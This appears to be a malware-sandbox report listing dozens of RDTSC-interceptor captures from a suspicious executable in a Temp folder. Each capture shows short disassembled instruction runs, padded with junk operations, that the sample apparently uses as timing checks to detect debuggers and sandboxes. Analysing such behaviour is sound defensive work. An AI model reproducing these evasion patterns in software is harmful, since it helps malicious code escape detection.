Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CBA62 second address: 6CBAF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ebx 0x00000009 je 00007F69D121AB31h 0x0000000f jmp 00007F69D121AB2Bh 0x00000014 pop ebx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F69D121AB28h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 jmp 00007F69D121AB37h 0x00000035 lea eax, dword ptr [ebp+1247F657h] 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F69D121AB28h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 mov edx, dword ptr [ebp+122D28A0h] 0x0000005b mov ecx, dword ptr [ebp+122D29A0h] 0x00000061 nop 0x00000062 pushad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CBAF0 second address: 6CBB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A4Eh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F8920 second address: 6F8927 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F8927 second address: 6F8943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007F69D1080A4Ch 0x0000000b jo 00007F69D1080A46h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F69D1080A46h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F9170 second address: 6F91A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB35h 0x00000009 jmp 00007F69D121AB36h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7006F5 second address: 700700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 700700 second address: 700706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 700706 second address: 700728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F69D1080A4Eh 0x0000000e jno 00007F69D1080A46h 0x00000014 pushad 0x00000015 popad 0x00000016 jnl 00007F69D1080A4Ch 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6FF511 second address: 6FF526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB2Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6FF69A second address: 6FF6AD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F69D1080A46h 0x00000008 jns 00007F69D1080A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6FF962 second address: 6FF9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB2Fh 0x00000009 jmp 00007F69D121AB2Eh 0x0000000e popad 0x0000000f jo 00007F69D121AB2Ah 0x00000015 push eax 0x00000016 pop eax 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop edx 0x0000001a pushad 0x0000001b jmp 00007F69D121AB39h 0x00000020 push eax 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 pop eax 0x00000026 jmp 00007F69D121AB30h 0x0000002b push eax 0x0000002c push edx 0x0000002d jne 00007F69D121AB26h 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6FFDF8 second address: 6FFE03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7003AC second address: 7003B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7003B2 second address: 7003B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 70630A second address: 706328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 706328 second address: 706332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F69D1080A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 705132 second address: 705141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jl 00007F69D121AB26h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 70547F second address: 705483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 705594 second address: 7055B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB37h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7055B4 second address: 7055B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7055B9 second address: 7055C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F69D121AB26h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 705B96 second address: 705B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 705B9A second address: 705BB9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F69D121AB26h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F69D121AB26h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 705BB9 second address: 705BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 705BBD second address: 705BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 70499B second address: 70499F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 70499F second address: 7049AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7049AF second address: 7049B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7049B5 second address: 7049B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7049B9 second address: 7049BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 70B2A8 second address: 70B2AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 70B2AE second address: 70B2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 70B2B7 second address: 70B2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 70B2C4 second address: 70B2C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 712F26 second address: 712F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 71308A second address: 7130A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 71672C second address: 716732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 716732 second address: 716740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F69D1080A46h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 716740 second address: 71677B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F69D121AB36h 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F69D121AB26h 0x00000017 jmp 00007F69D121AB33h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 716B5E second address: 716B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 716B62 second address: 716B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 71A116 second address: 71A11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 71A11C second address: 71A122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 71A122 second address: 71A127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 71A127 second address: 71A13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB2Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 71A69B second address: 71A6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 71A6A4 second address: 71A6A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 71A6A8 second address: 71A6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 720071 second address: 720075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 720075 second address: 720097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 720224 second address: 72022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72022A second address: 720238 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F69D1080A46h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72038F second address: 720397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7206A0 second address: 7206AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F69D1080A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7206AC second address: 7206B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CB590 second address: 6CB596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CB596 second address: 6CB59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 726E3E second address: 726E5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F69D1080A46h 0x0000000d jne 00007F69D1080A46h 0x00000013 pop eax 0x00000014 pushad 0x00000015 je 00007F69D1080A46h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72711D second address: 727122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7276C3 second address: 7276D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F69D1080A48h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7276D0 second address: 7276F4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F69D121AB28h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F69D121AB33h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7276F4 second address: 7276FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7276FA second address: 727700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 727700 second address: 727705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 727705 second address: 72770D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 727F0A second address: 727F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A52h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 727F23 second address: 727F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7284F6 second address: 7284FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7284FA second address: 72851B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72851B second address: 72851F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72851F second address: 728528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 728528 second address: 728530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 728530 second address: 728536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 728536 second address: 72853F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72853F second address: 72854F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB2Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 728AF3 second address: 728B14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F69D1080A4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F69D1080A48h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 728B14 second address: 728B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72CA6D second address: 72CA7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F69D1080A46h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72CBCA second address: 72CBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72CBD1 second address: 72CBD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72CBD6 second address: 72CBE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72CF0C second address: 72CF27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F69D1080A48h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F69D1080A4Bh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72CF27 second address: 72CF31 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72CF31 second address: 72CF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72CF35 second address: 72CF39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 72D351 second address: 72D372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F69D1080A50h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7320A3 second address: 7320C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push edi 0x00000008 jmp 00007F69D121AB2Ah 0x0000000d pop edi 0x0000000e popad 0x0000000f jnp 00007F69D121AB32h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 737F5F second address: 737F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F69D1080A46h 0x0000000a jmp 00007F69D1080A4Bh 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 jc 00007F69D1080A46h 0x0000001b popad 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
